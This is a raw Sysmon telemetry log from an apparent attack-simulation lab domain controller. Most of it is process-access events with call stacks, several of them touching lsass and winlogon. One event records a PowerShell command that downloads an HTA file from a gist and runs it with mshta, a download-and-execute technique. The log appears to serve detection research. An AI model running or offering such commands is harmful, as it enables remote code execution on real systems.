15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791686Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791685Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791684Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791683Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791682Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791681Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791680Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791679Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791678Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791677Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791676Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791675Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791674Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791673Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.516{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791672Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791671Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791670Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791669Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000791668Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791667Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-3267-6010-DFA2-00000000A301}52367604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8a2d32a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89774130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89773e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8a225466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89734997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89792e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+897764cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+897764cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8977635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+897682e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89774814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+897743b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89774130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89773e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+8a225466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89734997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+89792e66(wow64) 154100x8000000000000000791666Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.510{732C744F-3269-6010-E0A2-00000000A301}8116C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\system32\mshta.exe" c:\temp\test.htaC:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$var =Invoke-WebRequest \""https://gist.githubusercontent.com/MHaggis/a008d2d6a84fd7a28bee0135dcf28802/raw/f4750734bd61bad087b54c5a3c4fa4e6d9fd1b94/test.hta\"" $var.content|out-file \""c:\temp\test.hta\"" mshta \""c:\temp\test.hta\""} 11241100x8000000000000000791665Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:57.501{732C744F-3267-6010-DFA2-00000000A301}5236C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Temp\test.hta2021-01-26 15:16:57.501 10341000x8000000000000000792068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:58.798{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E8A2-00000000A301}7136C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 